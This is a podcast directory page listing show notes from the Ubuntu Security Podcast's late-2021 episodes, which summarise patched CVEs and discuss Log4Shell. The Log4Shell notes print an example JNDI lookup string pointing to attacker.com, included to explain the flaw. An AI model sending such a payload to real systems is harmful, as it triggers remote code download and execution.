TopPodcast.com
Menu
  • Home
  • Top Charts
  • Top Networks
  • Top Apps
  • Top Independents
  • Top Podfluencers
  • Top Picks
    • Top Business Podcasts
    • Top True Crime Podcasts
    • Top Finance Podcasts
    • Top Comedy Podcasts
    • Top Music Podcasts
    • Top Womens Podcasts
    • Top Kids Podcasts
    • Top Sports Podcasts
    • Top News Podcasts
    • Top Tech Podcasts
    • Top Crypto Podcasts
    • Top Entrepreneurial Podcasts
    • Top Fantasy Sports Podcasts
    • Top Political Podcasts
    • Top Science Podcasts
    • Top Self Help Podcasts
    • Top Sports Betting Podcasts
    • Top Stocks Podcasts
  • Podcast News
  • About Us
  • Podcast Advertising
  • Contact
Not in our directory?
Add Show Here
Podcast Equipment
Center

toppodcastlogoOur TOPPODCAST Picks

  • Comedy
  • Crypto
  • Sports
  • News
  • Politics
  • True Crime
  • Business
  • Finance

Follow Us

toppodcastlogoStay Connected

    View Top 200 Chart
    Back to Rankings Page
    Technology

    Ubuntu Security Podcast

    A fortnightly podcast talking about the latest developments and updates from the Ubuntu Security team, including a summary of recent security vulnerabilities and fixes as well as a discussion on some of the goings on in the wider Ubuntu Security community.

    Advertise

    Copyright: © Copyright 2019 Canonical

    • Apple Podcasts
    • Google Play
    • Spotify

    Latest Episodes:
    Episode 143 Dec 25, 2021
    Show notes

    Overview

    Happy holidays! This week we bring you the first part of a special two-part holiday themed feature by Camila from the Ubuntu Security team discussing the top cyber threats faced during the holidays.

    Get in contact

    • security@ubuntu.com
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter

    Episode 142 Dec 16, 2021
    Show notes

    Overview

    Just in time for the holidays, Log4Shell comes along to wreck everyone’s weekend - so we take a deep dive into the vulnerability that has set the internet on fire, plus we cover security updates for BlueZ, Firefox, Flatpak and more.

    This week in Ubuntu Security Updates

    27 unique CVEs addressed

    [USN-5183-1] BlueZ vulnerability [00:48]

    • 1 CVEs addressed in Bionic (18.04 LTS)
      • CVE-2019-8922
    • Heap based buffer overflow when handling overly large SDP requests - crash / possible code execution as a result

    [USN-5186-1] Firefox vulnerabilities [01:08]

    • 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-43540
      • CVE-2021-43546
      • CVE-2021-43545
      • CVE-2021-43543
      • CVE-2021-43542
      • CVE-2021-43541
      • CVE-2021-43539
      • CVE-2021-43538
      • CVE-2021-43537
      • CVE-2021-43536
    • 95.0

    [USN-5189-1] GLib vulnerability [01:34]

    • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
      • CVE-2021-3800
    • By setting the GLIB_CHARSETALIAS_DIR env var, could then possibly exploit setuid binaries like pkexec which are linked against glib to possibly read root-owned files - fixed to just have glib not read and use this environment variable

    [USN-5142-3] Samba regression [02:29]

    • 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-3671
      • CVE-2021-3738
      • CVE-2021-23192
      • CVE-2020-25722
      • CVE-2020-25721
      • CVE-2020-25719
      • CVE-2020-25718
      • CVE-2020-25717
      • CVE-2016-2124
    • Episode 138, Episode 141 - yet another upstream regression in Samba due to the most recent set of security updates which we discussed a month ago in episode 138

    [USN-5174-2] Samba regression

    • 4 CVEs addressed in Bionic (18.04 LTS)
      • CVE-2021-3671
      • CVE-2020-25722
      • CVE-2020-25717
      • CVE-2016-2124

    [USN-5191-1] Flatpak vulnerability [02:48]

    • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-41133
    • Possible to escape the flatpak sandbox by tricking services running on the host that they were not in fact communicating with a flatpak sandboxed application but with a regular unconfined application. As such they then wouldn’t restrict the actions which they would perform on behalf of the flatpak’d application and so could allow it to then escape it’s own confinement

    [USN-5193-1] X.Org X Server vulnerabilities [03:26]

    • 4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-4011
      • CVE-2021-4010
      • CVE-2021-4009
      • CVE-2021-4008
    • 4 different OOB writes that could be triggered by X clients - could then cause the X server to crash or possible code execution etc
    • In more recent releases, X runs as a regular user so impact is limited, and in most recent releases Ubuntu uses Wayland by default so it’s possible that on modern desktops there is no X server running at all \o/

    [USN-5192-1] Apache Log4j 2 vulnerability [04:12]

    • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-44228

    [USN-5197-1] Apache Log4j 2 vulnerability

    • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-45046

    Goings on in Ubuntu Security Community

    Log4Shell explodes the internet [04:20]

    • Vuln announced on Twitter late last Thursday / early Friday morning, linking to the upstream Github issue of a possible remote code execution vuln in Apache Log4j 2
    • Quickly it became apparent this was a high profile vuln that would affect a huge number of software products and have wide reaching consequences
    • Over the weekend started being picked up by mainstream news not just the security industry
    • Since then vendors and distros etc have scrambled to patch the vulnerability
    • Ubuntu released updates on Monday - 2.15.0 for Ubuntu >= 20.04 LTS and otherwise removed the offending class in Ubuntu 18.04 etc (USN-5192-1)
    • Stepping back
      • What is Log4j?
        • Extremely popular and widely used Java package for doing logging within applications
        • Is the 252nd most popular component in Maven Central repo by download volume for November 2021
        • Top 0.003% in popularity by downloads
        • Also is a dependency in close to 7000 other open source projects - is even in the Mars rover’s Ingenuity helicopter
          • Is in most other ASF software products (Struts, Spark, Kafka, Solr etc)
          • Plus a huge number of other projects:
            • Elastic Search, LogStash, GrayLog2, Minecraft (client and server)
              • Initial reports were this was first seen being exploited in Minecraft
          • Not to mention:
            • Apple iCloud, Steam, Samsung Cloud storage and more
      • What is the vulnerability?
        • Vuln is in the JNDI (Java Naming and Directory Interface) feature of log4j
        • JNDI allows Java objects to be referenced externally then loaded and used at runtime
        • JNDI supports different protocols to fetch classes, including LDAP, even DNS etc
        • Log4j supports lookups on variables which can encode a JNDI resource
        • So if you log a variable such as ${jndi:ldap://attacker.com/malware} Log4j will perform the lookup via LDAP to retrieve the Java class at that URI and then execute it
        • Remote code execution attacks don’t get any easier than this - esp since Java is write once, run anywhere - there is no architectural specific issues like with natively comiler languages like C/C++ etc
        • As such wasn’t surprising to see this given the highest possible CVSS score of 10.0 by ASF
      • How widespread is this issue?
        • As mentioned earlier so many different pieces of software use Log4j and have Log4j embedded within them, it is not just sufficient to say update your Ubuntu packaged version of log4j - if you are running custom / proprietary Java applications they may likely contain their own copy of Log4j2 and you may have to go and patch that directly
      • How to patch manually?
        • The easiest option would be to get an updated version of the application from the original vendor
        • Failing that, could go looking for all log4j2 jar archives and then could extract these (jar’s are zips afterall) and remove the offending class directly (java/org/apache/logging/log4j/core/lookup/JndiLookup)
      • How is it being exploited?
        • Kids popping Minecraft servers to other adversaries using this for more traditional attacks like deploying cryptominers etc - but given how widespread this issue is and how much coverage it has gotten it is likely everyone and anyone is looking to actively exploit it
    • Expect we will still be hearing about this for a long time - whether due to more vulns in Log4j2 but also since there are so many devices running Java out there and that likely have Log4j as part of that - could be a long tail of devices which take a long time (or even never get patched)
    • Could be the basis of the next Mirai style botnet of compromised devices?
    • In all the drama, it turned out there was a second vuln which could still be triggered to cause a least a DoS or possible information leaking / exfiltration - so a second upstream release 2.16.0 was done - this is now in Ubuntu >= 20.04 LTS as well (USN-5197-1)
    • KnowledgeBase article for this on the Ubuntu wiki too if you want more specific information

    Ubuntu Security Podcast Holiday specials [12:52]

    • Camila Camargo de Matos (aka mossoctopus) compiled a great 2-part series on cyber security threats and preparations for the holidays
    • Will be publishing that over the next couple weeks whilst the regular episodes take a break

    Ubuntu Security Podcast on break [13:37]

    • Will take a break for a few weeks and be back in early January
    • Wishing all listeners a safe and happy time if you are celebrating the holidays - fingers crossed 🤞 there is no more Log4Shell type vulnerabilities that drop during that time and everyone can have a proper break to recharge before 2022
    • We’ll be back then to bring you all the news for Ubuntu Security again

    Get in contact

    • security@ubuntu.com
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter

    Episode 141 Dec 10, 2021
    Show notes

    Overview

    A preview of some things to come for the Ubuntu Security Podcast plus we cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman and more.

    This week in Ubuntu Security Updates

    38 unique CVEs addressed

    [USN-5174-1] Samba vulnerabilities [00:58]

    • 4 CVEs addressed in Bionic (18.04 LTS)
      • CVE-2021-3671
      • CVE-2020-25722
      • CVE-2020-25717
      • CVE-2016-2124
    • Few weeks ago published Samba updates for a range of vulns - mentioned in Episode 139 the difficulties involved in patching older Samba versions like 4.7.6 as used in Ubuntu 18.04 - backports of patches for the more severe vulnerabilities including the ability for authenticated attackers to escalate privileges to root on domain machines and others

    [USN-5142-2] Samba regressions [02:06]

    • 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-3671
      • CVE-2021-3738
      • CVE-2021-23192
      • CVE-2020-25722
      • CVE-2020-25721
      • CVE-2020-25719
      • CVE-2020-25718
      • CVE-2020-25717
      • CVE-2016-2124
    • Original upstream patches caused a bunch of regressions - once upstream subsequently fixed these, we then updated our backports to include those regression fixes
    • How soon to ship vuln fixes?

    [USN-5171-1] Long Range ZIP vulnerabilities [03:22]

    • 9 CVEs addressed in Bionic (18.04 LTS)
      • CVE-2018-5786
      • CVE-2018-5747
      • CVE-2018-5650
      • CVE-2018-11496
      • CVE-2018-10685
      • CVE-2017-9929
      • CVE-2017-9928
      • CVE-2017-8846
      • CVE-2017-8844
    • Compression tool optimised to achieve better performance on larger files
    • Results of fuzzing by various researchers over time - AFL
    • 4 UAFs, 2 stack buffer overflows, 2 infinite loop, 1 heap buffer overflow

    [USN-5172-1] uriparser vulnerabilities [03:56]

    • 4 CVEs addressed in Bionic (18.04 LTS)
      • CVE-2018-20721
      • CVE-2018-19200
      • CVE-2018-19199
      • CVE-2018-19198
    • More fuzzing results -> Google AutoFuzz - seems to manage oss-fuzz etc
    • OOB write, integer overflow, OOB read, NULL ptr deref

    [USN-5173-1] libmodbus vulnerabilities [04:36]

    • 2 CVEs addressed in Bionic (18.04 LTS)
      • CVE-2019-14463
      • CVE-2019-14462
    • 1 vuln originally - OOB read on certain input - patch for this however contained a typo which then introduced a second vuln on a subset of the original input - second CVE assigned for that - both now fixed

    [USN-5170-1] MariaDB vulnerability [05:13]

    • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-35604
    • Latest upstream point releases:
      • 10.5.13 -> 21.04, 21.10
      • 10.3.32 -> 20.04
    • As usual not much details on the vuln (MariaDB fork of MySQL, maintained by Oracle who don’t provide a lot of specific details in their vulnerability reports)

    [USN-5178-1] Django vulnerability [06:04]

    • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-44420
    • Failed to handle URLs with embedded trailing newlines - newline would cause the URL to not match the existing URL path-based access controls so could bypass those

    [USN-5179-1] BusyBox vulnerabilities [06:33]

    • 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-42386
      • CVE-2021-42385
      • CVE-2021-42384
      • CVE-2021-42382
      • CVE-2021-42381
      • CVE-2021-42380
      • CVE-2021-42379
      • CVE-2021-42378
      • CVE-2021-42374
      • CVE-2021-28831
    • Busybox implements a lot of standard unix utilities in a single binary
    • UAF / OOB write when decompressing crafted gzip files
    • Heap OOB on when decompressing crafted lzma
    • Lots of UAFs in awk impl

    [USN-5180-1] Mailman vulnerability [07:37]

    • 1 CVEs addressed in Bionic (18.04 LTS)
      • CVE-2021-44227
    • Wouldn’t validate that a CSRF token used for admin pages was actually issued for that context - so a regular list user could take their own CSRF token, craft a URL for the admin user with this token and if the admin user visited that then they could evade the inteded CSRF protections - so could say change the admindb password etc

    [USN-5168-4] NSS regression [08:47]

    • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
      • CVE-2021-43527
    • Typo in backported patch could cause NSS to fail in some circumstances and cause an SSL session to fail (DoS)

    Goings on in Ubuntu Security Community

    Preview of some upcoming content and changes [09:26]

    Get in contact

    • security@ubuntu.com
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter

    Episode 140 Dec 03, 2021
    Show notes

    Overview

    A gnarly old bug in NSS is unearthed, plus we cover security updates for ICU, the Linux kernel and ImageMagick as well.

    This week in Ubuntu Security Updates

    20 unique CVEs addressed

    [USN-5156-1] ICU vulnerability [00:40]

    • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
      • CVE-2021-30535
    • Double free - originally reported in chromium but is actually in embedded copy of icu - able to be triggered on crafted content to icu, in the case of chromium this could be via a crafted webpage or similar so not too dissimilar to usual web handling issues - memory corruption -> code execution (but within chromium sandbox in that case)

    [USN-5158-1] ImageMagick vulnerabilities [01:25]

    • 5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
      • CVE-2021-20313
      • CVE-2021-20312
      • CVE-2021-20309
      • CVE-2021-20246
      • CVE-2021-20244
    • DoS vulns from untrusted inputs -> most all result in a divide by zero -> exception -> application crash

    [USN-5161-1] Linux kernel vulnerabilities [01:55]

    • 4 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
      • CVE-2021-42252
      • CVE-2021-3764
      • CVE-2021-3744
      • CVE-2021-3655
    • 5.11 kernel (generic hirsute + clouds, raspi, focal hwe etc)
    • armhf specific issue (Aspeed LPC bus controller) - local user OOB write -> crash / code-exec
    • AMD cryptographic coprocessor driver memory leaks -> DoS (Episode 138)
    • SCTP OOB read - incoming packets

    [USN-5162-1] Linux kernel vulnerabilities [03:13]

    • 5 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
      • CVE-2021-43057
      • CVE-2021-42252
      • CVE-2021-3764
      • CVE-2021-3744
      • CVE-2021-3655
    • 5.13 (impish, focal OEM)
    • same as above plus SELinux specific issue around handling of task credentials -> UAF -> memory corruption -> crash / code execution (Jann Horn @ GPZ)

    [USN-5163-1] Linux kernel vulnerabilities [03:59]

    • 4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
      • CVE-2021-3764
      • CVE-2021-3744
      • CVE-2021-37159
      • CVE-2021-3655
    • 5.4 (focal, bionic HWE)
    • AMD cryptographic coprocessor driver memory leaks -> DoS (Episode 138)
    • SCTP OOB read - incoming packets
    • USB Option High Speed Mobile driver -> UAF if unplug device before fully registered - local attacker could trigger - crash / code-exec

    [USN-5164-1] Linux kernel vulnerabilities [04:50]

    • 3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
      • CVE-2021-3764
      • CVE-2021-3744
      • CVE-2021-37159
    • 4.15 (bionic, xenial ESM, trusty ESM - azure)
    • AMD cryptographic coprocessor driver memory leaks -> DoS (Episode 138)
    • SCTP OOB read - incoming packets

    [USN-5165-1] Linux kernel (OEM) vulnerabilities [05:13]

    • 7 CVEs addressed in Focal (20.04 LTS)
      • CVE-2021-43389
      • CVE-2021-43267
      • CVE-2021-43056
      • CVE-2021-42739
      • CVE-2021-42327
      • CVE-2021-3772
      • CVE-2021-3760
    • Mix of vulns in various drivers
      • UAF in NFC, DoS due to SCTP logic error, OOB in AMD GPU debugfs (need root), FireDTV Firewire OOB write, POWER8 specific KVM issue (guest -> host crash), Transparent Inter-Process Communication (TIPC) OOB write, ISDN CAPI subsystem OOB write

    [USN-5168-1, USN-5168-2, USN-5168-3] NSS and Thunderbird vulnerability [06:08]

    • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-43527

    New NSS vulnerability (CVE-2021-43527) discussion [06:17]

    • Discovered by Tavis Ormandy at GPZ
    • NSS is a very old project, code in question has existed since 2003 and been exploitable since at least 2012 when it was refactored
    • Does a direct memcpy of an attacker controlled amount of data into a fixed size buffer without specifically checking whether the data is too large - classic heap-based buffer overflow
    • Object on the heap also contains function pointer which then get called so relatively easy to get control flow and code execution as a result
    • NSS was one of the first projects added to oss-fuzz (Google), Mozilla do own fuzzing as well, extensive testsuite and uses ASAN for internal builds
    • Uses Coverity but this didn’t detect it either
    • Existing fuzzing and unit tests had test cases which could reach this code but failed to find it for a number of reasons:
      • Fuzz input is limited to 10k - but to overflow need at least 16,384 bytes so fuzzing couldn’t have caught this
      • Individual code paths fuzzed but not so much end-to-end systematic testing - so nothing which would try generating say large inputs in this case - does occur for other code-paths though
      • Existing metrics almalgate results from all fuzzers - so hard to tell how well a piece of code has been fuzzed as it may have been using a fuzzed which may never trigger relevant input to find bugs like this
    • Seemingly well tested, well fuzzed code is not enough - need to look systematically and quantify how complete the coverage is not just in terms of LOC or inputs used, but also boundary conditions etc
    • https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html

    Get in contact

    • security@ubuntu.com
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter

    Episode 139 Nov 26, 2021
    Show notes

    Overview

    This week we put out a call for testing and feedback on proposed Samba updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman, Thunderbird, LibreOffice, BlueZ and more.

    This week in Ubuntu Security Updates

    15 unique CVEs addressed

    [USN-5150-1] OpenEXR vulnerability [00:39]

    • 1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
      • CVE-2021-3941
    • oss-fuzz -> div-by-zero with crafted image using YUV-encoded colors

    [USN-5151-1] Mailman vulnerabilities [00:58]

    • 2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
      • CVE-2021-43332
      • CVE-2021-43331
    • Similar to vulns in last Mailman update (Episode 136)

    [USN-5152-1] Thunderbird vulnerabilities [01:27]

    • 5 CVEs addressed in Impish (21.10)
      • CVE-2021-38509
      • CVE-2021-38507
      • CVE-2021-38506
      • CVE-2021-38504
      • CVE-2021-38503
    • 91.3.1
    • Usual web framework issues (HTML email etc) - one TB specific issue around the ability to force TB into full-screen via web content navigation - could then spoof usual chrome which is hidden in fullscreen and get user input unexpectedly

    [USN-5153-1] LibreOffice vulnerabilities [02:23]

    • 2 CVEs addressed in Focal (20.04 LTS)
      • CVE-2021-25634
      • CVE-2021-25633
    • 2 issues around interpretation / display of details for signed documents - could inject a new timestamp and get this shown as the time the document was signed, or could cause to show incorrect details for a signed document by adding details from another certificate
    • Too invasive to backport for 18.04 LTS

    [USN-5154-1] FreeRDP vulnerabilities [03:28]

    • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-41160
      • CVE-2021-41159
    • OOB write in client if sent malicious data from server -> crash / code-exec
    • if using a gateway and the RPC protocol, would fail to validate input -> malicious gateway could then corrupt client memory -> crash / code-exec

    [USN-5155-1] BlueZ vulnerabilities [04:07]

    • 3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-43400
      • CVE-2021-41229
      • CVE-2021-3658
    • Would save and restore discoverable status on power down / power up - so if powered down when discoverable would power up as discoverable
    • UAF if gatt client disconnected during a particular write operation with dbus - so would likely need bad luck or cooperation between a local application / user and the device to trigger
    • Memory leak in handling of SDP devices -> DoS

    Goings on in Ubuntu Security Community

    Samba updates available for testing for Ubuntu 18.04 LTS [05:24]

    • https://discourse.ubuntu.com/t/samba-update-for-ubuntu-18-04-lts-bionic/25408
    • Episode 138 discussed difficulties in handling large security updates for ageing software
    • Backport ~700 patches (with potential regressions) or backport newer version, possibly breaking things in the process due to new features / changes in behaviour etc (plus incompatibilities with other software in Ubuntu archive)
    • Upstream released
    • Contains fixes for the most severe CVEs from the most recent updates for Samba (USN-5142-1) - CVE-2016-2124, CVE-2020-25717, CVE-2020-25722, CVE-2021-3671

    Get in contact

    • security@ubuntu.com
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter

    Episode 138 Nov 19, 2021
    Show notes

    Overview

    This week we discuss some of the challenges and trade-offs encountered when providing security support for ageing software, plus we discuss security updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.

    This week in Ubuntu Security Updates

    42 unique CVEs addressed

    [USN-5138-1] python-py vulnerability [00:38]

    • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
      • CVE-2020-29651
    • Python library providing path handling, config file parsing and other features which are now in standard lib or other packages - has been deprecated
    • ReDoS against path handling code (regex with catastrophic backtracking)

    [USN-5139-1] Linux kernel (OEM 5.10) vulnerabilities [01:25]

    • 7 CVEs addressed in Focal (20.04 LTS)
      • CVE-2021-43389
      • CVE-2021-43056
      • CVE-2021-41864
      • CVE-2021-3760
      • CVE-2021-3764
      • CVE-2021-3744
      • CVE-2021-3655
    • Power8 specific KVM issue -> guest can crash host -> DoS
    • AMD cryptographic coprocessor driver memory leaks -> DoS
    • eBPF integer overflow -> DoS / code-exec
    • NFC UAF
    • SCTP info leak

    [USN-5140-1] Linux kernel (OEM 5.14) vulnerabilities [02:12]

    • 3 CVEs addressed in Focal (20.04 LTS)
      • CVE-2021-41864
      • CVE-2021-3764
      • CVE-2021-3744
    • eBPF integer overflow -> DoS / code-exec
    • AMD cryptographic coprocessor driver memory leaks -> DoS

    [USN-5137-2] Linux kernel vulnerabilities [02:33]

    • 9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
      • CVE-2021-3759
      • CVE-2021-3753
      • CVE-2021-3743
      • CVE-2021-3739
      • CVE-2021-35477
      • CVE-2021-34556
      • CVE-2021-3428
      • CVE-2020-36385
      • CVE-2019-19449
    • 5.4 (focal bluefield / oracle, bionic oracle / gke)

    [LSN-0082-1] Linux kernel vulnerability [03:05]

    • 4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
      • CVE-2021-3715
      • CVE-2021-3444
      • CVE-2020-29661
      • CVE-2020-29660
    • 2 high priority vulns from GPZ (Episode 138) in tty subsystem and 1 in BPF verifier - code-exec -> privesc
    • UAF in IPv4 networking routing handling

    [USN-5141-1] Firejail vulnerability [03:48]

    • 1 CVEs addressed in Focal (20.04 LTS)
      • CVE-2021-26910
    • TOCTOU race condition in handling of overlayfs - decided to drop support for overlayfs since was deemed - thanks to Reiner Herrmann for providing this update

    [USN-5142-1] Samba vulnerabilities [04:43]

    • 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-3671
      • CVE-2021-3738
      • CVE-2021-23192
      • CVE-2020-25722
      • CVE-2020-25721
      • CVE-2020-25719
      • CVE-2020-25718
      • CVE-2020-25717
      • CVE-2016-2124
    • Raft of issues including unauthenticated users able to become root on domain members since Samba might incorrectly map local users to domain members, plus incorrect handling of Kerberos tickets such that delegated users could become domain admin by confusing Samba on which user a ticket represented
    • Memory corruption issues too
    • In particular the fix to correctly map local to domain users results in changed behaviour regarding matching AD users to local users - would previously fallback to a local user but now does not to avoid someone specifying DOMAIN/root and then having that fallback to say root on the local machine
    • https://www.samba.org/samba/security/CVE-2020-25717.html

    [USN-5144-1] OpenEXR vulnerability [05:55]

    • 1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
      • CVE-2021-3933
    • Integer overflow -> buffer overflow -> crash / RCE

    [USN-5145-1] PostgreSQL vulnerabilities [06:08]

    • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-23222
      • CVE-2021-23214
    • Incorrect handling of SSL cert verification - could allow a remote attacker to inject arbitrary SQL queries on the initial connection establishment (similar to various STARTTLS vulns which have been seen recently) - would process data sent in the clear before the TLS connection had been established but should just throw this away
    • New upstream release with other bug fixes too (13.5 - impish/hirsute, 12.9 - focal, 10.19 - bionic)

    [USN-5147-1] Vim vulnerabilities [07:13]

    • 6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-3928
      • CVE-2021-3927
      • CVE-2021-3903
      • CVE-2021-3872
      • CVE-2019-20807
      • CVE-2017-17087
    • Swap file permissions handling, restricted mode bypass (shouldn’t be considered a real security mechanism), various memory corruption issues too

    [USN-5149-1] AccountsService vulnerability [08:01]

    • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-3939
    • Double free in SetLanguage() DBus method - memory corruption in root daemon which can be triggered by an unprivileged user - is due to a Ubuntu specific patch which we include so that when the user selects a language / format we save this in their ~/.pam_environment to keep settings in sync
    • Patch contained code to use an existing pointer but then freed it - and then it would get freed again by the original code
    • Priv-esc by getting accountsservice daemon to run arbitrary code

    [USN-5148-1] hivex vulnerability [09:24]

    • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-3504
    • Tools for handling Windows Registry hive files
    • OOB read with specially crafted input file -> crash -> DoS

    Goings on in Ubuntu Security Community

    How to handle large security updates in outdated software versions? [09:56]

    • Samba updates in [USN-5142-1] do not include Bionic
    • Upstream released a new 4.13.14 which we could upgrade to in F/H/I/J without a lot of work or risk of regression since those releases already used a more recent version like 4.11 etc so the change in behaviour as a result of upgrading was so large and other packages in the archive were still compatible with this new version
    • Upstream has released patches for these vulns back to 4.10 but this is 686 individual patches - bionic has Samba 4.7 and so would require a lot of manual work to backport these ~700 patches, and the risk of introducing a regression (ie breaking something) when backporting such a large set of changes is higher
      • We are security engineers not full-time Samba software developers so not cognisant of all the possible pitfalls etc
    • Other option would be to update Samba in bionic to 4.13.14 like in the later releases, other packages like talloc, tdb, tevent and ldb and these would all need to be upgraded as well
    • But this new Samba version only supports python3, not python2.7 which the older Samba currently in bionic does
    • FreeIPA in bionic is Python2 so would then be broken if we did this upgrade
    • We could also try and upgrade FreeIPA to a newer version which uses Python3 but it isn’t clear if the required Python3 dependencies even exist in the 18.04 archive - so they man need to be backported and introduced there as well
    • Either option involves a lot of change and hence complexity ∴ a high risk of regression
    • Unclear yet which will be the preferred option but this illustrates the difficulties involved in doing security support for old software versions which upstream has ceased to provide support
    • Will likely come across more cases like this as we get further into ESM support periods for various packages - Bionic is still in it’s LTS phase till 2023 so not even in ESM and already has trouble for Samba
    • Watch this space…

    Get in contact

    • security@ubuntu.com
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter

    Episode 137 Nov 12, 2021
    Show notes

    Overview

    This week we look at some details of the 29 unique CVEs addressed across the supported Ubuntu releases in the past 7 days and more.

    This week in Ubuntu Security Updates

    29 unique CVEs addressed

    [USN-5131-1] Firefox vulnerabilities [00:42]

    • 6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-38509
      • CVE-2021-38508
      • CVE-2021-38507
      • CVE-2021-38506
      • CVE-2021-38504
      • CVE-2021-38503
    • 94.0
      • Copy image link - copies final image URL after redirects - if a page were to then combine this with a content security policy which blocked a redirect, the image URL may then contain any authentication tokens - and so if a page could trick a user into copying and pasting that image URL into the page an attacker could steal their auth token
      • Various web framework issues

    [USN-5132-1] Thunderbird vulnerabilities [01:56]

    • 6 CVEs addressed in Impish (21.10)
      • CVE-2021-38501
      • CVE-2021-38500
      • CVE-2021-38498
      • CVE-2021-38497
      • CVE-2021-38496
      • CVE-2021-32810
    • 91.2.1
      • Usual web framework issues

    [USN-5133-1] ICU vulnerability [02:17]

    • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
      • CVE-2020-21913
    • unicode handling library
    • UAF - could be triggered if was packaging the ICU data with malicious input -> crash / RCU

    [USN-5135-1] Linux kernel vulnerability [02:43]

    • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
      • CVE-2021-3759
    • impish (5.13), hirsute (5.11), focal hwe (5.11)
    • IPC memory objects not properly accounted for in memcg - could allow to bypass limits and cause DoS

    [USN-5130-1] Linux kernel vulnerabilities [03:24]

    • 2 CVEs addressed in Trusty ESM (14.04 ESM)
      • CVE-2020-29660
      • CVE-2020-29661
    • 3.13
    • 2 vulns courtesy of Jann Horn (GPZ) - in tty subsystem - lock order issues - UAF - DoS/privesc (Episode 106)

    [USN-5136-1] Linux kernel vulnerabilities [04:06]

    • 9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
      • CVE-2021-42252
      • CVE-2021-38199
      • CVE-2021-3759
      • CVE-2021-3753
      • CVE-2021-3743
      • CVE-2021-3655
      • CVE-2020-36385
      • CVE-2020-36322
      • CVE-2019-19449
    • 4.15 (bionic, xenial hwe, trusty azure)
    • IPC memory object leak plus various other vulns from Episode 136

    [USN-5137-1] Linux kernel vulnerabilities [04:48]

    • 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
      • CVE-2021-42252
      • CVE-2021-3759
      • CVE-2021-3753
      • CVE-2021-3743
      • CVE-2021-3739
